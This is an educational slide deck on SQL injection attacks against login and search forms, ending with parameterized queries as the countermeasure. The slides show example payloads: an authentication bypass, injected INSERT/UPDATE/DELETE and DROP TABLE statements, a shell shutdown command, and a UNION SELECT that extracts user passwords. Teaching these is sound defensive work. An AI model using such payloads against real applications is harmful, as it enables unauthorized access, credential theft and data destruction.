SQL-Injections

Attacks on data management

Daniel Schosser
Sept. 2012

  1. What is a SQL-Injection?
  2. How do they work?
  3. What damage can a SQL-Injection do?
  4. What counter-messures do we have?

What is a SQL-Injection?

What is SQL?

What is a SQL-Injection?

What can we use SQL for?

What is a SQL-Injection?

How does SQL Statements look like?

SELECT *
FROM users
WHERE name="________" AND password="________";--
                
It consists of:
  • SQL-Syntax
  • Data
  • Logic
  • Metacharacters (*, %, ', --, #, ...)

What is a SQL-Injection?

Where do people use SQL?

What is a SQL-Injection?

Where are SQL-Injections possible?

What is a SQL-Injection?

Example SQL-Statement for a login-form

SELECT *
FROM users
WHERE name="________" AND password="________";--
                

What is a SQL-Injection?

Example SQL-Statement for a login-form

SELECT *
FROM users
WHERE name="John";--" AND password="________";
                

What damage can a SQL-Injection do?

Insert unauthorized data

Password: foobar"; INSERT INTO users (name, passwort, email) VALUES ("anonymous", "secret", "anonymous@example.com")

SELECT *
FROM users
WHERE name="not important" AND password="foobar";
INSERT INTO users (name, passwort, email) VALUES
("anonymous", "secret", "anonymous@example.com")";--
                

What damage can a SQL-Injection do?

Avoid authorisation

Username: "John"
Password: foobar" OR WHERE 1=1

SELECT *
FROM users
WHERE name="John" AND password="foobar" OR WHERE 1=1";--
                

What damage can a SQL-Injection do?

Data manipulation

Username: "John"
Password: foobar"; UPDATE users SET password="helloWorld

SELECT *
FROM users
WHERE name="John" AND password="foobar";
UPDATE users SET password="helloWorld";--
                

What damage can a SQL-Injection do?

Delete data

Username: "John"
Password: foobar"; DELETE FROM users WHERE level="admin

SELECT *
FROM users
WHERE name="John" AND password="foobar";
DELETE FROM users WHERE level="admin";--
                

What damage can a SQL-Injection do?

GO EXEC cmdshell("shutdown /s");--
Robert"); DROP TABLE Students;--

Gathering Informations

SELECT * FROM users WHERE 1=1

Gathering Informations

Problem:
The application is waiting for a username, an email adress and the users password. But the sql-injection results in three differently named columns.

UNION-Statement

We search for books:

2010
title price published
SQL Injection $29 2010
Ethical Hacking $26.99 2010

UNION-Statement

We search for books:

2010" UNION SELECT username, password, email FROM user#
title price published
Administrator secretPassword admin@foobar.com
Developer youWillNeverGuess developer@foobar.com
SQL Injection $29 2010
Support easyPassword support@foobar.com
Ethical Hacking $26.99 2010

What counter-messures do we have?

What counter-messures do we have?

public function fetchAllByUserId( $uid )
{
    return $this->fetchAllAbstract(
        $this->getBaseSelect()
             ->where( "users.id = ?", $uid )
    );
}
                

What counter-messures do we have?

All input is evil, until proven otherwise!
Michael Howard, David LeBlanc

Thank you!